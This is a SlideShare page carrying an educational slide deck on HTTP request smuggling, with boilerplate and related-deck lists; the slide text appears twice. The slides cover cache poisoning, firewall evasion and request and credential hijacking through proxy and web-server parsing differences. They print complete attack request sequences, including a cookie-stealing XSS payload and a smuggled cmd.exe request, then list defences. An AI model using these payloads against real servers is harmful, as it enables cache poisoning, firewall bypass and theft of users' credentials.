SlideShare une entreprise Scribd logo
1  sur  41
Télécharger pour lire hors ligne
HTTP REQUEST SMUGGLING


         APIJAY KUMAR
        ABHISHEK SHETTY
         RAHUL KADLE


                          1
Overview of HTTP Request Smuggling
• A result of a device failure to properly handle deformed
  inbound HTTP requests

• Attacker sends multiple special HTTP requests that cause
  the two attacked entities to see two different sets of
  requests.

• Allows the hacker to smuggle a request to one device
  without the other device being aware of it.

• HRS does not require the existence of an application
  vulnerability.

                                                             2
Threats
• Financial loss result of web site deforming.

• Steal user credential using cross site scripting

• Warm attack like Nimda by attacking web filter
  firewalls.



                                                     3
Basic Concept




                4
Terminology
• HTTP header
• Web proxy (e.g:Squid, ISA server 200)
• Web server (e.g:Tomcat,IIS,Apache,Weblogic)




                                                5
HTTP header




              6
Web proxy
• Examples: Squid, ISA server 2000
• Acts as an intermediary for requests
  from clients seeking resources or services
  from other servers
• Resources like file, connection, web page
• Services like request to web server, done to
  simplify and control complexity


                                                 7
Web server
• HTTP server or application server
• Is a program that serves content using
  the HTTP protocol
• Example: Tomcat, IIS, Apache, Weblogic




                                           8
History Of HTTP SMUGGLING
• Microsoft Internet Explorer versions 5.01 SP4 and
  prior, 6.0 SP2 and 7.0 had input validation error

• Sun java proxy 3.x, 4.x and Sun one app server 7.x,
  8.x easily lead to web cache poisoning because of
  non-standard HTTP behavior.

• Oracle’s corrupt cache server led to the inability of
  the firewall to detect malicious requests

                                                          9
Basic concept




                10
Scenario 1
• An attacker can launch a smuggling attack in
  order to poison the cache server.

• Attacker an change the entries in the cache, so
  that an existing page A would be cached
  under URL B.

• This type of attack is on the cache server.
                                                 11
Scenario 2
• Smuggling bypasses the firewall installed
  before the web server.

• Directly compromises web security.

• This attack is in the web server itself.



                                              12
Scenario 3
• Use of proxy server that shares TCP
  connection with web server.

• Attacker steals client credentials without
  contact.

• Potentially strong attack.


                                               13
Setting 3 continued….




                        14
Types of Attacks
•   Cross-Site Scripting (XSS)
•   Web Cache Poisoning (defacement)
•   Cross User attacks
•   Hijacking pages with user-specific information
•   Browser cache poisoning




                                                 15
Cross-site Scripting
• Injects client-side malicious code
• Folds malicious content into content delivered
  from a compromised site
• Special case of code injection
• Examples




                                               16
Cross-site Scripting




                       17
Cache Poisoning
• Find vulnerable code

• Flush out cache server actual content

• Send special request which gets stored

• The response to any client request will be the
  infected content

                                                   18
Cache Poisoning




                  19
Cross User Attacks
• Single request to create 2 responses
• Second response mis-interpreted as response
  to different query
• May be other user sharing same TCP
  connection
• Mimic behaviour and obtain private info



                                                20
Cross User attacks




                     21
Hijacking pages with user-specific
           information




                                     22
Example with code


                    23
Web Cache Poisoning(header)
1 POST http://SITE/foobar.html HTTP/1.1
2 Host: SITE
3 Connection: Keep-Alive
4 Content-Type: application/x-www-form-urlencoded
5 Content-Length: 0
6 Content-Length: 44
7 [CRLF]
8 GET /poison.html HTTP/1.1
9 Host: SITE
10 Bla: [space after the "Bla:", but no CRLF]
11 GET http://SITE/page_to_poison.html HTTP/1.1
12 Host: SITE
13 Connection: Keep-Alive
14 [CRLF]



                                                    24
Web Cache Poisoning(Cache Server)


• Cache Server reads LAST CONTENT HEADER
• Web Server reads FIRST CONTENT HEADER




                                           25
FIREWALL/IPS/IDS EVASION
1 POST /page.asp HTTP/1.1
2 Host: chaim3 Connection: Keep-Alive
4 Content-Length: 49223
5 [CRLF]
6 zzz...zzz ["z" x 49152]
7 POST /page.asp HTTP/1.0
8 Connection: Keep-Alive
9 Content-Length: 30
10 [CRLF]
11 POST /page.asp HTTP/1.0
12 Bla: [space after the "Bla:", but no CRLF]
13 POST /page.asp?cmd.exe HTTP/1.0
14 Connection: Keep-Alive
15 [CRLF]



                                                26
FIREWALL Parsing
• Firewall reads the request with header length
  49,223 bytes. line 6 (49,152 copies of "z") and
  lines 7-10 (in salmon, total of 71 bytes) as its
  body (49,152+71=49,223)
• Then continues to parse the second request at
  line 11 and treats Line 13 till last as part of Bla



                                                    27
Overall Result



• CMD.EXE gets smuggled
• Popular Nimda and code red attack




                                      28
REQUEST HIJACKING
1 POST /some_script.jsp HTTP/1.0
2 Connection: Keep-Alive
3 Content-Type: application/x-www-form-urlencoded
4 Content-Length: 9
5 Content-Length: 204
6
7 this=thatPOST /vuln_page.jsp HTTP/1.0
8 Content-Type: application/x-www-form-urlencoded
9 Content-Length: 95
10
11
param1=value1&data=<script>alert("stealing%20your%20data:"%2bdo
cument.cookie)</script>&foobar=


                                                             29
ISA server 2000(cache server)/Tomcat
               Parsing
• Microsoft ISA/2000 proxy server as a single POST
  request
• Tomcat would interpret it as one complete HTTP
  POST(lines 1-7, including “this=that” on line 7)
• And one incomplete POST request, whose
  declared body length is 95 bytes, but with only 94
  bytes provided (lines 7-11) and is queued
• The first (complete) request invokes a response
  (which is sent by ISA to the attacker).
                                                   30
Attackers Request
• When ISA now receives a request from a client (e.g., a GET
  request), that request is forwarded to Tomcat,
• Request:
POST /vuln_page.jsp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
• Below is glued
param1=value1&data=<script>alert("stealing%20your
%20data:"%2bdocument.cookie)</script>&foobar=G
• Notice that the client will receive an HTML page with
  malicious Javascript code in it:
<script>alert("stealing your
data:"+document.cookie)</script>



                                                               31
REQUEST CREDENTIAL
  HIJACKING(THROUGH A PROXY SERVER)
The attack is as follows:
1. POST /some_script.jsp HTTP/1.0
2. Connection: Keep-Alive
3. Content-Type: application/x-www-form-urlencoded
4. Content-Length: 9
5. Content-Length: 142
6. this=thatGET
    /some_page.jsp?param1=value1&param2=value2
    HTTP/1.0
7. Content-Type: application/x-www-form-urlencoded
8. Content-Length: 0
9. Foobar:

                                                     32
REQUEST CREDENTIAL
  HIJACKING(THROUGH A PROXY SERVER)
When the client sends a request, such as:
1. GET /mypage.jsp HTTP/1.0
2. Cookie: my_id=1234567
3. Authorization: Basic ugwerwguwygruwy
Tomcat will glue this to the queued incomplete request, and together,
it will have:
1. GET /some_page.jsp?param1=value1&param2=value2 HTTP/1.0
2. Content-Type: application/x-www-form-urlencoded
3. Content-Length: 0
4. Foobar: GET /mypage.jsp HTTP/1.0
• Cookie: my_id=1234567
• Authorization: Basic ugwerwguwygruwy



                                                                    33
HRS TECHNIQUES


                 34
Double Content-Length header
• The cache server uses the last Content-Length header,
  while the web server uses the first Content-Length header
  (examples #1and #4).
• The following cache servers were observed to use the last
  Content-Length header:
       Microsoft ISA/2000
       Sun Microsystems SunONE 3.6 SP4
• The following web servers were observed to use the first
  Content-Length header:
       Jakarta Tomcat 5.0.19 (Coyote/1.1)
       Tomcat 4.1.24 (Coyote/1.0)
      Sun Microsystems SunONE web server 6.1 SP1

                                                              35
GET Request with Content-Length
          (backward smuggling)
• The web servers that display this behavior are:
      Microsoft IIS/6.0
      Jakarta Tomcat 5.0.19 (Coyote/1.1),
      Tomcat 4.1.24 (Coyote/1.0)
      Sun Microsystems SunONE web server 6.1 SP1
• Sample Attack:
1 GET http://SITE/static_foobar.html HTTP/1.1
2 Connection: Keep-Alive
3 Host: SITE
4 Content-Type: application/x-www-form-urlencoded
5 Content-Length: 40
6
7 GET http://SITE/page_to_poison.html HTTP/1.1
8 Foo: GET /poison.html HTTP/1.0
9

                                                    36
CRLF SP CRLF trick
• Entities that treat CRLF SP CRLF as a continuation of the previous
  header::
        Checkpoint FW-1 kernel R55W beta
        Squid (under some conditions)
        Tomcat 4.1.24 (Coyote/1.0)
        Sun Microsystems SunONE web server 6.1 SP1
• Web servers that treat CRLF SP CRLF as an end of headers mark:
        Microsoft IIS/5.0
Sample Attack:
1 POST /dynamic_foobar.asp HTTP/1.0
2 Connection: Keep-Alive
3 Content-Type: application/x-www-form-urlencoded
4 [SP]
5 GET /malicious_url HTTP/1.0
6


                                                                       37
CRLF SP CRLF trick
Sample Attack:
1 POST /dynamic_foobar.asp HTTP/1.0
2 Connection: Keep-Alive
3 Content-Type: application/x-www-form-urlencoded
4 [SP]
5 GET /malicious_url HTTP/1.0
6
1.   FW-1 will send lines 1-6 to the web server (IIS/5.0)
2.   IIS/5.0 will interpret this input as two requests




                                                            38
Prevention
• Install web application firewall which protects
  against the HRS attacks.
• Terminate the client session after each session
• Turn all pages to non-cacheable
• Deploy web server which follows strict HTTP
  parsing procedure.
• Allow only SSL communication from client to
  server.
• Turn off TCP connection sharing on the
  intermediate devices.

                                                    39
Conclusion
• Commonly Ignored because of its
  complications.
• Difficult to detect in logs.
• Poison proxy caches, pilfer credentials and
  leverage XSS without involving client




                                                40
41

Contenu connexe

Tendances

Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
Shubham Takode
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
Frank Victory
 

Tendances (20)

Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
 
Web Security Attacks
Web Security AttacksWeb Security Attacks
Web Security Attacks
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
 
Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET Applications
 
Post XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesPost XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and Remedies
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security Vulnerabilities
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Design and Analyze Secure Networked Systems - 3
Design and Analyze Secure Networked Systems - 3Design and Analyze Secure Networked Systems - 3
Design and Analyze Secure Networked Systems - 3
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaser
 
Hafnium attack
Hafnium attackHafnium attack
Hafnium attack
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
Information Security Systems
Information Security SystemsInformation Security Systems
Information Security Systems
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security Testing
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 

En vedette

Hoctief research
Hoctief researchHoctief research
Hoctief research
eraticsoul
 
News May 31 - Jun 6
News May 31 -  Jun 6News May 31 -  Jun 6
News May 31 - Jun 6
nuthorn
 

En vedette (15)

Smb agency handbook
Smb agency handbookSmb agency handbook
Smb agency handbook
 
Hoctief research
Hoctief researchHoctief research
Hoctief research
 
Appsbar
AppsbarAppsbar
Appsbar
 
Highproof High Range Pressure Switch MD Series
Highproof High Range Pressure Switch MD SeriesHighproof High Range Pressure Switch MD Series
Highproof High Range Pressure Switch MD Series
 
02B Brand Protection by Zoom-Soft
02B  Brand Protection by Zoom-Soft02B  Brand Protection by Zoom-Soft
02B Brand Protection by Zoom-Soft
 
บทที่ 5 การจัดการข้อความ
บทที่ 5 การจัดการข้อความบทที่ 5 การจัดการข้อความ
บทที่ 5 การจัดการข้อความ
 
News May 31 - Jun 6
News May 31 -  Jun 6News May 31 -  Jun 6
News May 31 - Jun 6
 
Hizb 6
Hizb 6Hizb 6
Hizb 6
 
Flameproof Highproof Low Range DP Switch FC Series
Flameproof Highproof Low Range DP Switch FC SeriesFlameproof Highproof Low Range DP Switch FC Series
Flameproof Highproof Low Range DP Switch FC Series
 
Hitachi Solutions Ecommerce Integration with Dynamics CRM 2013
Hitachi Solutions Ecommerce Integration with Dynamics CRM 2013Hitachi Solutions Ecommerce Integration with Dynamics CRM 2013
Hitachi Solutions Ecommerce Integration with Dynamics CRM 2013
 
Blogging for beginners imnabeel
Blogging for beginners   imnabeelBlogging for beginners   imnabeel
Blogging for beginners imnabeel
 
Head Mounted Temperature Transmitter
Head Mounted Temperature TransmitterHead Mounted Temperature Transmitter
Head Mounted Temperature Transmitter
 
Attract short sale listings like a magnet
Attract short sale listings like a magnetAttract short sale listings like a magnet
Attract short sale listings like a magnet
 
Final research and planning
Final research and planningFinal research and planning
Final research and planning
 
Class Slideshow
Class SlideshowClass Slideshow
Class Slideshow
 

Similaire à Http requesting smuggling

Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
Developing Revolutionary Web Applications using Comet and Ajax Push
Developing Revolutionary Web Applications using Comet and Ajax PushDeveloping Revolutionary Web Applications using Comet and Ajax Push
Developing Revolutionary Web Applications using Comet and Ajax Push
Doris Chen
 
HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装
inaz2
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz
 
15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt
shatrutrial44
 

Similaire à Http requesting smuggling (20)

Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
 
Isys20261 lecture 09
Isys20261 lecture 09Isys20261 lecture 09
Isys20261 lecture 09
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
Computer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptxComputer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptx
 
Developing Revolutionary Web Applications using Comet and Ajax Push
Developing Revolutionary Web Applications using Comet and Ajax PushDeveloping Revolutionary Web Applications using Comet and Ajax Push
Developing Revolutionary Web Applications using Comet and Ajax Push
 
Proxy http ftp dns email
Proxy http ftp dns emailProxy http ftp dns email
Proxy http ftp dns email
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装HTTPプロクシライブラリproxy2の設計と実装
HTTPプロクシライブラリproxy2の設計と実装
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
JUDCon 2013- JBoss Data Grid and WebSockets: Delivering Real Time Push at Scale
JUDCon 2013- JBoss Data Grid and WebSockets: Delivering Real Time Push at ScaleJUDCon 2013- JBoss Data Grid and WebSockets: Delivering Real Time Push at Scale
JUDCon 2013- JBoss Data Grid and WebSockets: Delivering Real Time Push at Scale
 
Using Communication and Messaging API in the HTML5 World
Using Communication and Messaging API in the HTML5 WorldUsing Communication and Messaging API in the HTML5 World
Using Communication and Messaging API in the HTML5 World
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
14_526_topic11.ppt
14_526_topic11.ppt14_526_topic11.ppt
14_526_topic11.ppt
 
14_526_topic11.ppt
14_526_topic11.ppt14_526_topic11.ppt
14_526_topic11.ppt
 
computer networking
computer networkingcomputer networking
computer networking
 
15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt15_526_topic11 for topics for students.ppt
15_526_topic11 for topics for students.ppt
 
526_topic08.ppt
526_topic08.ppt526_topic08.ppt
526_topic08.ppt
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Burp suite
Burp suiteBurp suite
Burp suite
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
 

Http requesting smuggling

  • 1. HTTP REQUEST SMUGGLING APIJAY KUMAR ABHISHEK SHETTY RAHUL KADLE 1
  • 2. Overview of HTTP Request Smuggling • A result of a device failure to properly handle deformed inbound HTTP requests • Attacker sends multiple special HTTP requests that cause the two attacked entities to see two different sets of requests. • Allows the hacker to smuggle a request to one device without the other device being aware of it. • HRS does not require the existence of an application vulnerability. 2
  • 3. Threats • Financial loss result of web site deforming. • Steal user credential using cross site scripting • Warm attack like Nimda by attacking web filter firewalls. 3
  • 5. Terminology • HTTP header • Web proxy (e.g:Squid, ISA server 200) • Web server (e.g:Tomcat,IIS,Apache,Weblogic) 5
  • 7. Web proxy • Examples: Squid, ISA server 2000 • Acts as an intermediary for requests from clients seeking resources or services from other servers • Resources like file, connection, web page • Services like request to web server, done to simplify and control complexity 7
  • 8. Web server • HTTP server or application server • Is a program that serves content using the HTTP protocol • Example: Tomcat, IIS, Apache, Weblogic 8
  • 9. History Of HTTP SMUGGLING • Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and 7.0 had input validation error • Sun java proxy 3.x, 4.x and Sun one app server 7.x, 8.x easily lead to web cache poisoning because of non-standard HTTP behavior. • Oracle’s corrupt cache server led to the inability of the firewall to detect malicious requests 9
  • 11. Scenario 1 • An attacker can launch a smuggling attack in order to poison the cache server. • Attacker an change the entries in the cache, so that an existing page A would be cached under URL B. • This type of attack is on the cache server. 11
  • 12. Scenario 2 • Smuggling bypasses the firewall installed before the web server. • Directly compromises web security. • This attack is in the web server itself. 12
  • 13. Scenario 3 • Use of proxy server that shares TCP connection with web server. • Attacker steals client credentials without contact. • Potentially strong attack. 13
  • 15. Types of Attacks • Cross-Site Scripting (XSS) • Web Cache Poisoning (defacement) • Cross User attacks • Hijacking pages with user-specific information • Browser cache poisoning 15
  • 16. Cross-site Scripting • Injects client-side malicious code • Folds malicious content into content delivered from a compromised site • Special case of code injection • Examples 16
  • 18. Cache Poisoning • Find vulnerable code • Flush out cache server actual content • Send special request which gets stored • The response to any client request will be the infected content 18
  • 20. Cross User Attacks • Single request to create 2 responses • Second response mis-interpreted as response to different query • May be other user sharing same TCP connection • Mimic behaviour and obtain private info 20
  • 22. Hijacking pages with user-specific information 22
  • 24. Web Cache Poisoning(header) 1 POST http://SITE/foobar.html HTTP/1.1 2 Host: SITE 3 Connection: Keep-Alive 4 Content-Type: application/x-www-form-urlencoded 5 Content-Length: 0 6 Content-Length: 44 7 [CRLF] 8 GET /poison.html HTTP/1.1 9 Host: SITE 10 Bla: [space after the "Bla:", but no CRLF] 11 GET http://SITE/page_to_poison.html HTTP/1.1 12 Host: SITE 13 Connection: Keep-Alive 14 [CRLF] 24
  • 25. Web Cache Poisoning(Cache Server) • Cache Server reads LAST CONTENT HEADER • Web Server reads FIRST CONTENT HEADER 25
  • 26. FIREWALL/IPS/IDS EVASION 1 POST /page.asp HTTP/1.1 2 Host: chaim3 Connection: Keep-Alive 4 Content-Length: 49223 5 [CRLF] 6 zzz...zzz ["z" x 49152] 7 POST /page.asp HTTP/1.0 8 Connection: Keep-Alive 9 Content-Length: 30 10 [CRLF] 11 POST /page.asp HTTP/1.0 12 Bla: [space after the "Bla:", but no CRLF] 13 POST /page.asp?cmd.exe HTTP/1.0 14 Connection: Keep-Alive 15 [CRLF] 26
  • 27. FIREWALL Parsing • Firewall reads the request with header length 49,223 bytes. line 6 (49,152 copies of "z") and lines 7-10 (in salmon, total of 71 bytes) as its body (49,152+71=49,223) • Then continues to parse the second request at line 11 and treats Line 13 till last as part of Bla 27
  • 28. Overall Result • CMD.EXE gets smuggled • Popular Nimda and code red attack 28
  • 29. REQUEST HIJACKING 1 POST /some_script.jsp HTTP/1.0 2 Connection: Keep-Alive 3 Content-Type: application/x-www-form-urlencoded 4 Content-Length: 9 5 Content-Length: 204 6 7 this=thatPOST /vuln_page.jsp HTTP/1.0 8 Content-Type: application/x-www-form-urlencoded 9 Content-Length: 95 10 11 param1=value1&data=<script>alert("stealing%20your%20data:"%2bdo cument.cookie)</script>&foobar= 29
  • 30. ISA server 2000(cache server)/Tomcat Parsing • Microsoft ISA/2000 proxy server as a single POST request • Tomcat would interpret it as one complete HTTP POST(lines 1-7, including “this=that” on line 7) • And one incomplete POST request, whose declared body length is 95 bytes, but with only 94 bytes provided (lines 7-11) and is queued • The first (complete) request invokes a response (which is sent by ISA to the attacker). 30
  • 31. Attackers Request • When ISA now receives a request from a client (e.g., a GET request), that request is forwarded to Tomcat, • Request: POST /vuln_page.jsp HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 95 • Below is glued param1=value1&data=<script>alert("stealing%20your %20data:"%2bdocument.cookie)</script>&foobar=G • Notice that the client will receive an HTML page with malicious Javascript code in it: <script>alert("stealing your data:"+document.cookie)</script> 31
  • 32. REQUEST CREDENTIAL HIJACKING(THROUGH A PROXY SERVER) The attack is as follows: 1. POST /some_script.jsp HTTP/1.0 2. Connection: Keep-Alive 3. Content-Type: application/x-www-form-urlencoded 4. Content-Length: 9 5. Content-Length: 142 6. this=thatGET /some_page.jsp?param1=value1&param2=value2 HTTP/1.0 7. Content-Type: application/x-www-form-urlencoded 8. Content-Length: 0 9. Foobar: 32
  • 33. REQUEST CREDENTIAL HIJACKING(THROUGH A PROXY SERVER) When the client sends a request, such as: 1. GET /mypage.jsp HTTP/1.0 2. Cookie: my_id=1234567 3. Authorization: Basic ugwerwguwygruwy Tomcat will glue this to the queued incomplete request, and together, it will have: 1. GET /some_page.jsp?param1=value1&param2=value2 HTTP/1.0 2. Content-Type: application/x-www-form-urlencoded 3. Content-Length: 0 4. Foobar: GET /mypage.jsp HTTP/1.0 • Cookie: my_id=1234567 • Authorization: Basic ugwerwguwygruwy 33
  • 35. Double Content-Length header • The cache server uses the last Content-Length header, while the web server uses the first Content-Length header (examples #1and #4). • The following cache servers were observed to use the last Content-Length header: Microsoft ISA/2000 Sun Microsystems SunONE 3.6 SP4 • The following web servers were observed to use the first Content-Length header: Jakarta Tomcat 5.0.19 (Coyote/1.1) Tomcat 4.1.24 (Coyote/1.0) Sun Microsystems SunONE web server 6.1 SP1 35
  • 36. GET Request with Content-Length (backward smuggling) • The web servers that display this behavior are: Microsoft IIS/6.0 Jakarta Tomcat 5.0.19 (Coyote/1.1), Tomcat 4.1.24 (Coyote/1.0) Sun Microsystems SunONE web server 6.1 SP1 • Sample Attack: 1 GET http://SITE/static_foobar.html HTTP/1.1 2 Connection: Keep-Alive 3 Host: SITE 4 Content-Type: application/x-www-form-urlencoded 5 Content-Length: 40 6 7 GET http://SITE/page_to_poison.html HTTP/1.1 8 Foo: GET /poison.html HTTP/1.0 9 36
  • 37. CRLF SP CRLF trick • Entities that treat CRLF SP CRLF as a continuation of the previous header:: Checkpoint FW-1 kernel R55W beta Squid (under some conditions) Tomcat 4.1.24 (Coyote/1.0) Sun Microsystems SunONE web server 6.1 SP1 • Web servers that treat CRLF SP CRLF as an end of headers mark: Microsoft IIS/5.0 Sample Attack: 1 POST /dynamic_foobar.asp HTTP/1.0 2 Connection: Keep-Alive 3 Content-Type: application/x-www-form-urlencoded 4 [SP] 5 GET /malicious_url HTTP/1.0 6 37
  • 38. CRLF SP CRLF trick Sample Attack: 1 POST /dynamic_foobar.asp HTTP/1.0 2 Connection: Keep-Alive 3 Content-Type: application/x-www-form-urlencoded 4 [SP] 5 GET /malicious_url HTTP/1.0 6 1. FW-1 will send lines 1-6 to the web server (IIS/5.0) 2. IIS/5.0 will interpret this input as two requests 38
  • 39. Prevention • Install web application firewall which protects against the HRS attacks. • Terminate the client session after each session • Turn all pages to non-cacheable • Deploy web server which follows strict HTTP parsing procedure. • Allow only SSL communication from client to server. • Turn off TCP connection sharing on the intermediate devices. 39
  • 40. Conclusion • Commonly Ignored because of its complications. • Difficult to detect in logs. • Poison proxy caches, pilfer credentials and leverage XSS without involving client 40
  • 41. 41